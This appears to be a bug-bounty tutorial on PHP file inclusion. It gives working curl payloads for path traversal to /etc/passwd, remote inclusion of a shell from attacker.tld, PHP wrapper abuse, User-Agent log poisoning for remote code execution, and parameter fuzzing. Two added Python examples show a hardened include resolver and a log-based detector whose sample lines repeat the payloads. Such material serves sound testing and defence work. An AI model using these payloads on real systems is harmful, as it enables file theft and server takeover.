File Inclusion bugs are the web’s skeleton keys. One sloppy include($_GET['page']) and suddenly you’re pulling /etc/passwd, dropping webshells, or hijacking logs. They’re old-school, but they still bleed into bug bounty programs — especially in legacy apps, unfiltered dev panels, and forgotten PHP endpoints.
What is File Inclusion?
File Inclusion occurs when a web application loads files based on user input without proper sanitization.
Local File Inclusion (LFI): Attacker loads a file from the local filesystem.
Remote File Inclusion (RFI): Attacker loads a file from a remote server.
Common consequences: Source code disclosure, sensitive config leaks, log poisoning, and sometimes RCE.
LFI Basics
# Simple traversal
curl "http://target.tld/index.php?page=../../../../etc/passwd"
# With URL encoding
curl "http://target.tld/index.php?page=..%2f..%2f..%2f..%2fetc/passwd"
# With double URL encoding
curl "http://target.tld/index.php?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd"
Targets: /etc/passwd, /etc/hosts, Apache/nginx logs, application config files, Windows boot.ini or win.ini.
RFI Basics
# Point to external server hosting payload.php
curl "http://target.tld/index.php?page=http://attacker.tld/shell.txt"
Note: Most modern PHP installs have allow_url_include=0, so RFI is rarer in the wild, but it is still useful in CTFs and legacy bounty targets.
Wrappers (PHP Specific)
# PHP filter wrapper to read source code
curl "http://target.tld/index.php?page=php://filter/convert.base64-encode/resource=index.php"
# Expect wrapper
curl "http://target.tld/index.php?page=expect://id"
# Data wrapper
curl "http://target.tld/index.php?page=data://text/plain,<?php system('id'); ?>"
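As an added example (not code from the original post), here is the defensive mirror of the sloppy include($_GET['page']) pattern, written in Python rather than PHP so it can be run and checked offline: a naive join that shows why the traversal payloads in the LFI section land on /etc/passwd, next to a hardened resolver that allowlists page names, peels repeated URL encoding before judging the value, rejects every stream-wrapper and URL scheme from the RFI and wrapper sections, and confirms the final realpath stays under the base directory. ALLOWED_PAGES, BASE_DIR and the page names are constructed assumptions standing in for a real application's template set.

```python
"""
Defensive mirror of include($_GET['page']): a naive join that shows why the
traversal payloads land on /etc/passwd, next to a hardened resolver.
Added example, not code from the original post. ALLOWED_PAGES and BASE_DIR are
constructed assumptions standing in for a real application's template set.
"""
import os
import urllib.parse

# Constructed: the only page names the application is willing to include.
ALLOWED_PAGES = {"home", "about", "contact"}
# Constructed: directory the included templates live in.
BASE_DIR = os.path.realpath("/var/www/app/pages")


class IncludeRejected(ValueError):
    """Raised when a user-supplied page value fails any check."""


def naive_resolve(user_value: str) -> str:
    """The sloppy pattern: trust the parameter and join it onto the base directory."""
    return os.path.join(BASE_DIR, user_value)


def fully_decode(value: str, rounds: int = 3) -> str:
    """Peel repeated URL encoding so %252e%252e%252f is judged as '../', not as literal text."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_page(user_value: str) -> str:
    """Return the file to include, or raise IncludeRejected."""
    decoded = fully_decode(user_value)
    # Any scheme (php://, data://, expect://, http://) or drive letter is an instant reject:
    # a page name never legitimately contains a colon.
    if ":" in decoded:
        raise IncludeRejected("scheme or wrapper in page name")
    # No separators, no parent references, no NUL truncation tricks.
    if any(ch in decoded for ch in ("/", "\\", "\x00")) or ".." in decoded:
        raise IncludeRejected("path characters in page name")
    # Positive allowlist: the value must be one of the known page names.
    if decoded not in ALLOWED_PAGES:
        raise IncludeRejected("unknown page")
    # Defence in depth: even a listed name must resolve inside BASE_DIR after symlinks.
    candidate = os.path.realpath(os.path.join(BASE_DIR, decoded + ".php"))
    if os.path.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        raise IncludeRejected("resolved outside base directory")
    return candidate


def is_safe(user_value: str) -> bool:
    """Convenience wrapper: True if resolve_page accepts the value."""
    try:
        resolve_page(user_value)
        return True
    except IncludeRejected:
        return False


if __name__ == "__main__":
    for value in ("home", "../../../../etc/passwd",
                  "%252e%252e%252f%252e%252e%252fetc%252fpasswd",
                  "php://filter/convert.base64-encode/resource=index.php"):
        print(f"{value!r:60} naive={os.path.normpath(naive_resolve(value))} safe={is_safe(value)}")
```

The allowlist is the real control; the colon, separator and realpath checks are there so that a future edit to ALLOWED_PAGES (or a symlink dropped into the templates directory) still cannot turn the include into a file read.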
Exploitation Escalation
Log Poisoning: Inject PHP into Apache/Nginx logs via User-Agent, then LFI to include the log.
# Malicious User-Agent
curl -A "<?php system($_GET['cmd']); ?>" http://target.tld/
# Trigger inclusion
curl "http://target.tld/index.php?page=../../../../var/log/apache2/access.log&cmd=id"
Session Poisoning: If the app stores sessions in /tmp/sess_*, you can poison them.
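The detection counterpart to the log-poisoning and session-poisoning chains above, as an added example that is not part of the original post: a scanner over Apache combined-format access-log lines that flags traversal (after peeling repeated URL encoding), stream-wrapper or remote schemes in the query string, requests for the sensitive files named in this post, and PHP open tags in the User-Agent, then correlates a planted tag with a later traversal from the same address. The log lines and IP addresses are constructed samples.

```python
"""
Detection side of the LFI / log-poisoning chains: a small scanner over Apache
combined-format access-log lines. Added example, not code from the original
post; LOG_LINES below are constructed samples, not real traffic.
"""
import re
import urllib.parse
from collections import defaultdict

# Apache "combined" format: ip ident user [ts] "req" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
# Stream wrappers and remote schemes that never belong in a page parameter.
WRAPPER_RE = re.compile(r"\b(?:php|data|expect|phar|zip|glob|file|ftp|https?):", re.IGNORECASE)
# Files this post lists as LFI targets, including the log and session paths.
SENSITIVE_RE = re.compile(
    r"/etc/passwd|/etc/hosts|/proc/self/environ|boot\.ini|win\.ini|"
    r"access\.log|error\.log|/tmp/sess_",
    re.IGNORECASE,
)
PHP_TAG_RE = re.compile(r"<\?(?:php|=)", re.IGNORECASE)

# Constructed sample traffic: a benign request, encoded and plain traversal,
# a wrapper read, a poisoned User-Agent, and the follow-up log include.
LOG_LINES = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1042 "-" "curl/8.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?page=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1042 "-" "curl/8.0"',
    '198.51.100.9 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 3310 "-" "curl/8.0"',
    '198.51.100.9 - - [10/Oct/2023:13:57:10 +0000] "GET / HTTP/1.1" 200 120 "-" "<?php system($_GET[\'cmd\']); ?>"',
    '198.51.100.9 - - [10/Oct/2023:13:57:15 +0000] "GET /index.php?page=../../../../var/log/apache2/access.log&cmd=id HTTP/1.1" 200 9000 "-" "curl/8.0"',
]


def decode_fully(value: str, rounds: int = 3) -> str:
    """Peel repeated URL encoding so %252e%252e%252f is judged as '../'."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyze(line: str):
    """Return {'ip', 'path', 'findings'} for a parsed line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = m.group("path")
    query = decode_fully(path.partition("?")[2])
    findings = []
    if TRAVERSAL_RE.search(query):
        findings.append("traversal")
    if WRAPPER_RE.search(query):
        findings.append("wrapper_or_remote")
    if SENSITIVE_RE.search(query):
        findings.append("sensitive_file")
    # A PHP open tag in the User-Agent (or a parameter) is the log-poisoning precursor.
    if PHP_TAG_RE.search(m.group("ua")) or PHP_TAG_RE.search(query):
        findings.append("php_tag")
    return {"ip": m.group("ip"), "path": path, "findings": findings}


def poisoning_chains(lines):
    """IPs that planted a PHP tag and afterwards pulled a file via traversal."""
    seen = defaultdict(set)
    chained = []
    for line in lines:
        hit = analyze(line)
        if hit is None:
            continue
        seen[hit["ip"]].update(hit["findings"])
        if "php_tag" in seen[hit["ip"]] and "traversal" in hit["findings"] and hit["ip"] not in chained:
            chained.append(hit["ip"])
    return chained


if __name__ == "__main__":
    for line in LOG_LINES:
        hit = analyze(line)
        if hit and hit["findings"]:
            print(hit["ip"], hit["path"][:60], hit["findings"])
    print("log-poisoning chains:", poisoning_chains(LOG_LINES))
```

Decoding before matching is what makes the double-encoded payload visible; matching the raw request line would miss it. The chain check is deliberately order-sensitive, since the tag has to be in the log before the include can execute it.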
Automation & Discovery
# ffuf brute force params that might trigger inclusion
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-params.txt:FUZZ \
-u "http://target.tld/index.php?FUZZ=../../../../etc/passwd"
# wfuzz variant
wfuzz -c -z file,params.txt \
"http://target.tld/index.php?FUZZ=../../../../etc/passwd"
Bug Bounty Context
LFI is often dismissed as “just file read” — but chaining makes it bounty-worthy:
LFI → source code → DB creds → SQL takeover.
LFI → log poisoning → RCE.
LFI → /proc/self/environ → code execution on misconfigured PHP.
Even read-only LFI can be high-impact if you leak sensitive configs (API keys, cloud creds).
References
OWASP Testing Guide: https://owasp.org/www-community/attacks/Path_Traversal
PayloadAllTheThings (File Inclusion): https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
HackTricks LFI: https://book.hacktricks.xyz/pentesting-web/file-inclusion
Command Recap
# LFI basic
curl "http://target.tld/index.php?page=../../../../etc/passwd"
# RFI basic
curl "http://target.tld/index.php?page=http://attacker.tld/shell.txt"
# PHP filter wrapper
curl "http://target.tld/index.php?page=php://filter/convert.base64-encode/resource=index.php"
# Log poisoning
curl -A "<?php system($_GET['cmd']); ?>" http://target.tld/
curl "http://target.tld/index.php?page=../../../../var/log/apache2/access.log&cmd=id"
Final Thoughts
File Inclusion is proof that old bugs never die — they just get re-skinned. Spot the unfiltered include, and you’re already halfway to root.